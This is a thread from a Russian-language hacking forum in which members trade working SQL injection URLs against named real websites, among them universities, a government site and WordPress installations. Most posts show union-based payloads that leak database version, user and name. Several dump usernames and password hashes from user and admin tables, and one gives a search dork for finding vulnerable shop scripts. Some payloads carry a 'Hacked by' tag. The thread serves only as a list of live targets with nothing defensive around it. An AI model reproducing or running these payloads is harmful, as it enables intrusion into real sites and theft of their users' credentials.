SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    240
    Likes Received:
    161
    Reputations:
    108
    retailmagazine.ru ТИЦ-475 PR-5 blind
    Code:
    http://retailmagazine.ru/tofirmcard.php?num=1573+and+5=substring(version(),1,1)+--+
    Code:
    http://retailmagazine.ru/tofirmcard.php?num=1573+and+4=substring(version(),1,1)+--+
    learning.pmi.org PR-5
    Code:
    http://learning.pmi.org/course-detail.php?id=-2018+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
    
    Code:
    5.0.96-log:pmiprof@184.168.193.190:pmiprof
    reps.ru ТИЦ-200
    Code:
    http://reps.ru/print.php?news=-2640'+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,0,11,12,13,14+--+
    Code:
    5.5.29-MariaDB-log:repsru@rslocal:repsru
     
  2. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Система активной рекламы

    Система активной рекламы

    dork: intext:"POWERED BY SHOPFORBUX.RU"

    PoC:

    Code:
    _http://kassirbux.ru/news.php?id=0%27+union+select+1,2,3,4+--+
    Code:
    _http://www.wm-explorer.ru/news.php?id=0%27+union+select+1,usename,3,4+FROM+tb_users+--+
    Code:
    _http://wm-cap.ru/news.php?id=0%27+union+select+1,username,password,4+FROM+tb_users+--+
    Code:
    _http://www.web-sprint.ru/news.php?id=0%27+union+select+1,username,password,4+FROM+tb_users+--+
    Code:
    _http://piar-bux.ru/news.php?id=0%27+union+select+1,username,password,4+FROM+tb_users+--+
    Code:
    _http://vicap.ru/news.php?id=0%27+union+select+1,username,password,4+FROM+tb_users+--+
    Code:
    _http://bux1.php-market.ru/news.php?id=0%27+union+select+1,username,password,4+FROM+tb_users+--+
    Code:
    _http://comfymoney.ru/news.php?id=0%27+union+select+1,username,password,4+FROM+tb_users+--+
     
    #15662 WallHack, 8 Dec 2013
    Last edited: 11 Dec 2013
  3. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.capochino.it/article.php?id=-151+union+select+1,0x4861636b6564206279205365706f,3,4,5,6,7,8,9,10--
    Code:
    http://www.aessweb.com/journal-detail.php?id=-5003+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
     
  4. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Тиц 1300

    Duplicate entry 'CHARACTER_SETS1' for key 1
     
    _________________________
  5. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.romania.ici.ro/en/turism/pagina.php?id=-426+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13--
    Code:
    http://apiexchange.com/index_main.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7--
    Code:
    http://www.snr.gov.ar/imprimir.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12--
    Code:
    http://www.mobil-com.cz/downloads_info.php?id=-79+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
     
  6. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Code:
    http://www.efbw.eu/news.php?ID=59+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5+--+
     
  7. comynicator

    comynicator New Member

    Joined:
    20 Mar 2012
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    _ttp://www.futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,10,11+--+
     
  8. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Code:
    http://www.northernoutpost.com/news.php?id=99+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8+--+
     
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,467
    Likes Received:
    398
    Reputations:
    228
    PR7
    http://www.uni-erlangen.de/studium/studienangebot/uebersicht/studiengang-anzeige.php?id=-239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63+--+

    Админку не нашёл(
     
    #15669 DezMond™, 12 Dec 2013
    Last edited: 12 Dec 2013
    2 people like this.
  10. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    Code:
    http://www.injury-advocates.com/wp-content/plugins/formcraft/form.php?id=3+union+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11+--
     
    1 person likes this.
  11. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.moreanartscenter.org/news.php?id=-3119+union+select+1,0x4861636b6564206279205365706f,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12--
    Code:
    http://www.transitionceo.com/news.php?id=-41'+union+select+1,2,0x4861636b6564206279205365706f,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10+--+
    Code:
    http://www.henleystandard.co.uk/news/news.php?id=-999+union+select+1,2,3,@@basedir,5,0x4861636b6564206279205365706f,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12--
     
    1 person likes this.
  12. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Тиц 0 Пр 6

    Code:
    http://unilag.edu.ng/news.php?id=-32+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
     
  13. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://eyesurgeryeducation.org/resources-news.php?id=-30+union+select+1,0x4861636b6564206279205365706f,3,4--
    Code:
    http://www.e-portal.com.ua/news.php?id=-11+union+select+1,0x4861636b6564206279205365706f,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13--
    Code:
    http://www.stragtur.com/news.php?news=-28+union+select+1,0x4861636b6564206279205365706f,3,concat_ws(0x3a,version(),user(),database()),5,6,7--
     
  14. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Code:
    http://charliemars.com/news.php?id=-165+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6+--+
     
  15. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    ++++
     
    #15675 Улыбайся, 14 Dec 2013
    Last edited: 14 Dec 2013
  16. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Code:
    http://www.bcnaerospace.org/public/new.php?id=-117'+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7+--+
     
    2 people like this.
  17. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Судовое Яхтенное Оборудование
    Code:
    http://www.zhigunov.com.ua/index.php?act=motor&sub_motor=-6+union+select+1,2,3,4,5,6,7,8,9,10,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28zhigunov_zhigunov.adminarea%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,pass%29%29%29%29x%29,12,13,14,15+--+
    Админка
    Note: Тут расшифровываем хэш
     
    #15677 Unknowhacker, 15 Dec 2013
    Last edited: 15 Dec 2013
    2 people like this.
  18. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    СОВЕТ европейским аэрокосмическим ОБЩЕСТВ

    Code:
    http://www.ceas.org/members.php?id=-8+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+
     
  19. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://sips.inesc-id.pt/people.php?id=-93+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,0x4861636b6564206279205365706f,7,8,9,10--
     
  20. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    212
    Likes Received:
    52
    Reputations:
    116
    Code:
    http://jootem.me/wp-content/plugins/formcraft/form.php?id=53+UNION+SELECT+1,2,3,user_pass,5,6,7,8,9,10,11+FROM+wp_users+WHERE+id=1
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.